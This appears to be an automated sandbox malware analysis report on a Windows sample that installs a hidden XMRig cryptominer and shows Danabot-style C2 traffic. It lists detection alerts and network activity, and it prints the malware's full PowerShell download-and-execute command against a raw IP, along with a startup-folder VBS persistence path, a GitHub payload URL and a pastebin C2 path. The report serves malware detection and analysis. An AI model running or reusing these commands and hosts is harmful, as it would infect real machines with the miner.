Author: Florian Roth (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" , ProcessId: 1848, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7624, TargetFilename: C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7408, TargetFilename: C:\Users\user\AppData\Local\Temp\installer.ps1

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1076, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7624, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\installer.ps1" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline", ProcessId: 7836, ProcessName: csc.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T08:09:59.130589+0100	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.4	56035	1.1.1.1	53	UDP
2025-03-06T08:11:00.849298+0100	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.4	56610	1.1.1.1	53	UDP

ETPRO COINMINER XMR CoinMiner Usage

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T08:09:11.368287+0100	2826930	2	Crypto Currency Mining Activity Detected	192.168.2.4	49862	80.240.16.67	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T08:10:45.850614+0100	2803305	3	Unknown Traffic	192.168.2.4	49840	204.79.197.203	443	TCP

ETPRO MALWARE Win32/Danabot CnC Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T08:09:12.012623+0100	2854648	1	A Network Trojan was detected	192.168.2.4	49733	45.144.212.77	16000	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T08:09:12.012623+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49733	45.144.212.77	16000	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: yjYJ8QncaF.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: yjYJ8QncaF.exe	Virustotal: Detection: 66%			Perma Link
Source: yjYJ8QncaF.exe	ReversingLabs: Detection: 60%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Bitcoin Miner

Yara detected Fallen Miner

Source: Yara match	File source: 00000009.00000002.2568842224.0000000057B10000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2563552633.0000000011120000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2584264262.000000C000222000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2591995379.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2590132663.000000C000400000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY

Source: unknown	HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49915 version: TLS 1.2

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.pdb source: powershell.exe, 00000004.00000002.1927473773.0000021333708000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.pdbhP{ source: powershell.exe, 00000004.00000002.1927473773.0000021333708000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	File opened: C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	File opened: C:\Users\user\AppData\Local\Temp\FB99.tmp	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	File opened: C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	File opened: C:\Users\user\	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2854648 - Severity 1 - ETPRO MALWARE Win32/Danabot CnC Activity (GET) : 192.168.2.4:49733 -> 45.144.212.77:16000

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 140.82.121.3 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 140.82.121.4 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.199.111.133 443	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Network Connect: 192.248.189.11 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.19.24 443	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Network Connect: 80.240.16.67 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 204.79.197.203 443

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: pastebin.com
Source: unknown	DNS query: name: pastebin.com

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 16000
Source: unknown	Network traffic detected: HTTP traffic on port 16000 -> 49733

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 45.144.212.77:16000

Source: global traffic	HTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=B2839CD2-4BE9-4400-AD2A-0BF869E77C09&user=m-3af76558b00d443a9ad81c242fa1ca4b HTTP/1.1Host: api.msn.com
Source: global traffic	HTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=F382943E-8A19-46B8-82E2-2971F42A647D&user=m-92cabb8a9a894a8da154426fc571baf3 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=67c94a75faaa4034a8aad2a21e3705fe.RefC=2025-03-06T07:10:45Z; MUIDB=2BDEF2C17CF065930A7CE7667DD8645A; _EDGE_V=1; MUID=2BDEF2C17CF065930A7CE7667DD8645A
Source: global traffic	HTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=25090651-CE2C-4596-9CEC-2A7C423572D8&user=m-28a30e7e33f3473abd7bc9d52e8648b1 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=67c94a75faaa4034a8aad2a21e3705fe.RefC=2025-03-06T07:10:45Z; MUIDB=2BDEF2C17CF065930A7CE7667DD8645A; _EDGE_V=1; MUID=2BDEF2C17CF065930A7CE7667DD8645A
Source: global traffic	HTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=2C4005B0-16EF-45D1-A50F-3A2114E679E1&user=m-c7724915d8e34d7180084956b2b46c72 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=67c94a75faaa4034a8aad2a21e3705fe.RefC=2025-03-06T07:10:45Z; MUIDB=2BDEF2C17CF065930A7CE7667DD8645A; _EDGE_V=1; MUID=2BDEF2C17CF065930A7CE7667DD8645A

Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 80.240.16.67 80.240.16.67
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3

Source: Joe Sandbox View

ASN Name: GITHUBUS GITHUBUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49733 -> 45.144.212.77:16000
Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:56035 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:56610 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49862 -> 80.240.16.67:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49840 -> 204.79.197.203:443

Source: global traffic

HTTP traffic detected: GET /setup HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 45.144.212.77:16000Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.212.77

Source: global traffic	HTTP traffic detected: GET /letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/941574414/ea8c5442-d9b8-4ab4-85a4-be28e4f102f4?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250306%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250306T070749Z&X-Amz-Expires=300&X-Amz-Signature=94f807f186fff902594da70b0bd11fe885067e4e35e90d9346a9b5ca605f6d97&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-hidden.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exeAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/941574414/ea8c5442-d9b8-4ab4-85a4-be28e4f102f4?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250306%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250306T071022Z&X-Amz-Expires=300&X-Amz-Signature=69f207c00220bca909139fa44c2edc50f5c286f6798ed8fd6a19149a51a8b1ca&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-hidden.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exeAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=B2839CD2-4BE9-4400-AD2A-0BF869E77C09&user=m-3af76558b00d443a9ad81c242fa1ca4b HTTP/1.1Host: api.msn.com
Source: global traffic	HTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=F382943E-8A19-46B8-82E2-2971F42A647D&user=m-92cabb8a9a894a8da154426fc571baf3 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=67c94a75faaa4034a8aad2a21e3705fe.RefC=2025-03-06T07:10:45Z; MUIDB=2BDEF2C17CF065930A7CE7667DD8645A; _EDGE_V=1; MUID=2BDEF2C17CF065930A7CE7667DD8645A
Source: global traffic	HTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=25090651-CE2C-4596-9CEC-2A7C423572D8&user=m-28a30e7e33f3473abd7bc9d52e8648b1 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=67c94a75faaa4034a8aad2a21e3705fe.RefC=2025-03-06T07:10:45Z; MUIDB=2BDEF2C17CF065930A7CE7667DD8645A; _EDGE_V=1; MUID=2BDEF2C17CF065930A7CE7667DD8645A
Source: global traffic	HTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=2C4005B0-16EF-45D1-A50F-3A2114E679E1&user=m-c7724915d8e34d7180084956b2b46c72 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=67c94a75faaa4034a8aad2a21e3705fe.RefC=2025-03-06T07:10:45Z; MUIDB=2BDEF2C17CF065930A7CE7667DD8645A; _EDGE_V=1; MUID=2BDEF2C17CF065930A7CE7667DD8645A
Source: global traffic	HTTP traffic detected: GET /setup HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 45.144.212.77:16000Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: pool.hashvault.pro
Source: global traffic	DNS traffic detected: DNS query: api.msn.com

Source: powershell.exe, 00000003.00000002.1820169013.000001D9A5CC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.144.21
Source: powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.144.212.
Source: powershell.exe, 00000003.00000002.1820169013.000001D9A5CC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.144.212.77/
Source: powershell.exe, 00000003.00000002.1820169013.000001D9A59C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.144.212.77:16000
Source: powershell.exe, 00000003.00000002.1820059614.000001D9A5790000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1851509576.000001D9BDF12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.144.212.77:16000/setup
Source: powershell.exe, 00000003.00000002.1845912601.000001D9B5813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1845912601.000001D9B5956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1927473773.0000021339AB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
